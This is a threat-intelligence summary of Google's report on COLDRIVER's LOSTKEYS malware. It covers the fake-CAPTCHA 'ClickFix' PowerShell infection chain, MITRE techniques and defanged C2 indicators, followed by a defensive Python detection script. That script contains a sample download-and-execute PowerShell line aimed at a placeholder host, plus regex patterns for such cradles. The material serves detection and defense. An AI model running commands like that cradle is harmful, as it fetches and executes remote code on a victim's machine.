Google Threat Intelligence Group (GTIG) has uncovered LOSTKEYS, new malware from the Russian state-linked group COLDRIVER that targets high-profile individuals to steal files and system data through a multi-stage PowerShell infection chain. Mitigations include Google Safe Browsing updates, warnings to targeted high-risk users, and user awareness of the fake-CAPTCHA lure. (Affected: governments, NGOs, journalists, think tanks)
Key points:
- LOSTKEYS is malware attributed to the Russian state-backed group COLDRIVER, which targets sectors of intelligence value to the Russian government.
- The malware steals files from a hard-coded set of directories and sends system information and the list of running processes to the attackers.
- COLDRIVER's usual tradecraft is credential phishing against governments of NATO countries, NGOs, and former intelligence and diplomatic officers.
- The infection chain starts with a fake CAPTCHA page that tricks the user into pasting and running a PowerShell command (the "ClickFix" technique).
- The second stage hashes the device's display resolution and stops if the hash matches values associated with virtual machines, so the next payload is fetched only on what looks like a real victim host.
- The final stage retrieves a Base64-encoded payload together with a Visual Basic Script (VBS) decoder; the decoder keys are unique to each infection chain.
- LOSTKEYS extends COLDRIVER's capabilities beyond credential theft to file exfiltration, deployed only against select targets.
- Earlier samples from December 2023 posed as Maltego software but executed the same malware; whether they belong to the same actor is unclear.
- Google has added the malicious domains and files to Safe Browsing, alerts targeted users in high-risk groups, and recommends enabling Enhanced Safe Browsing and keeping devices updated.
- YARA rules and indicators of compromise are shared to aid detection and community defense.
MITRE Techniques:
- Phishing (T1566) – COLDRIVER uses credential phishing via targeted emails to gain initial access.
- Command and Scripting Interpreter: PowerShell (T1059.001) – Malware delivered and executed through PowerShell commands.
- Masquerading (T1036) – December 2023 samples masquerade as legitimate Maltego software files.
- User Execution (T1204) – The infection relies on social engineering users to execute PowerShell scripts after fake CAPTCHA interaction.
- System Information Discovery (T1082) – The malware collects system information and the list of running processes and sends them to the attackers (the process enumeration additionally maps to Process Discovery, T1057).
- File and Directory Discovery (T1083) – LOSTKEYS enumerates hard-coded directories for files with specific extensions before exfiltrating them.
- Virtualization/Sandbox Evasion (T1497) – The second stage computes a hash of the display resolution and compares it with known virtual-machine values to avoid running in sandbox/VM environments.
- Data Encoding (T1132) – Downloaded stages are Base64 encoded, and the final payload is decoded by the VBS decoder with a substitution cipher whose keys are unique per infection chain.
- Ingress Tool Transfer (T1105, formerly Remote File Copy) – Each stage is downloaded from attacker-controlled C2 servers.
- Obfuscated Files or Information (T1027) – The per-infection decoding keys make every delivered payload differ on disk, which is most plausibly intended to defeat hash- and signature-based detection (this is obfuscation rather than Indicator Removal, T1070, since no deletion of logs or artifacts is described).
Indicators of Compromise:
- The article lists hashes for the malware components at each infection stage, e.g. 13f7599c9… for the fake-CAPTCHA stage and 28a0596b… for the final decoded payload (truncated here; the full values are in the article).
- Command-and-control IP addresses such as 165.227.148[.]68 and 80.66.88[.]67 are provided for network detection.
- Domains such as cloudmediaportal[.]com and njala[.]dev are identified as malicious infrastructure used by the threat actor.
- YARA rules with string patterns unique to the VBS decoder and to the beaconing of stolen data are shared to support automated detection.
- The per-infection decoding keys and Base64-encoded payloads are noted because they shape forensic analysis and rule writing: hashes and keys from one infection will not match another, so detection has to target the decoder's structure and the chain's behaviour rather than sample-specific values.
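As an added example (not code from the Google TIG article or from COLDRIVER's tooling), the Python below turns two items on this page into runnable detection logic: the network IoCs under Indicators of Compromise, refanged and matched against a few constructed DNS/proxy log lines, and the ClickFix initial-execution step from the key points, expressed as a heuristic over constructed Sysmon-style process-creation records (field names Image, ParentImage, CommandLine). The parent-process and command-line markers are general ClickFix assumptions, not the exact command COLDRIVER used, which the page does not reproduce; the log lines, events and hostnames are constructed here.

```python
import ntpath
import re

# Network IoCs exactly as listed on the page, in defanged form.
DEFANGED_IOCS = {
    "165.227.148[.]68": "c2_ip",
    "80.66.88[.]67": "c2_ip",
    "cloudmediaportal[.]com": "c2_domain",
    "njala[.]dev": "c2_domain",
}


def refang(ioc: str) -> str:
    """Undo common defanging so the value can be compared with real logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {refang(k) for k, v in DEFANGED_IOCS.items() if v == "c2_ip"}
IOC_DOMAINS = {refang(k) for k, v in DEFANGED_IOCS.items() if v == "c2_domain"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def match_network_log(line: str) -> list[tuple[str, str]]:
    """Return (indicator, kind) pairs found in one DNS or proxy log line.

    Domains match on the exact host or on any subdomain of a listed domain,
    because the actor controls the zone and can serve stages from any label.
    """
    hits = []
    for ip in IP_RE.findall(line):
        if ip in IOC_IPS:
            hits.append((ip, "c2_ip"))
    for host in HOST_RE.findall(line):
        host = host.lower()
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            hits.append((host, "c2_domain"))
    return hits


# ClickFix heuristic (assumption, not the exact COLDRIVER command line, which
# the page does not reproduce): the lure has the victim paste a command into
# the Win+R Run box, so PowerShell is spawned by explorer.exe and typically
# hides its window and/or pulls the next stage with a download cradle.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr|frombase64string)\b"
    r"|\s-e(nc|ncodedcommand)?\s",
    re.I,
)


def is_clickfix_like(event: dict) -> bool:
    """Flag a Sysmon Event ID 1-style record (Image/ParentImage/CommandLine)."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmd = event.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe") or parent != "explorer.exe":
        return False
    return bool(HIDDEN_RE.search(cmd) or CRADLE_RE.search(cmd))


# Constructed sample data for illustration; none of it comes from the article.
SAMPLE_NETWORK_LOGS = [
    "2025-05-07T10:01:12Z dns query=static.cloudmediaportal.com type=A client=10.0.0.21",
    "2025-05-07T10:01:13Z proxy CONNECT njala.dev:443 dst=80.66.88.67 client=10.0.0.21",
    "2025-05-07T10:02:00Z dns query=updates.example.org type=A client=10.0.0.22",
]

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/s)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File deploy.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]


def scan(lines=SAMPLE_NETWORK_LOGS, events=SAMPLE_EVENTS) -> dict:
    """Run both checks and return what an analyst would triage."""
    return {
        "network_hits": [(i, h) for i, l in enumerate(lines) for h in match_network_log(l)],
        "clickfix_events": [i for i, e in enumerate(events) if is_clickfix_like(e)],
    }


if __name__ == "__main__":
    for key, value in scan().items():
        print(key, value)
```

The third sample event is deliberately a benign PowerShell launch from explorer.exe: the parent alone is not enough to alert on, which is why the heuristic also requires a hidden window or a download cradle. Subdomain matching matters because the actor can stage files from any label under a domain it controls, while the hash IoCs on this page are of limited use for the final payload, whose per-infection keys change its bytes every time.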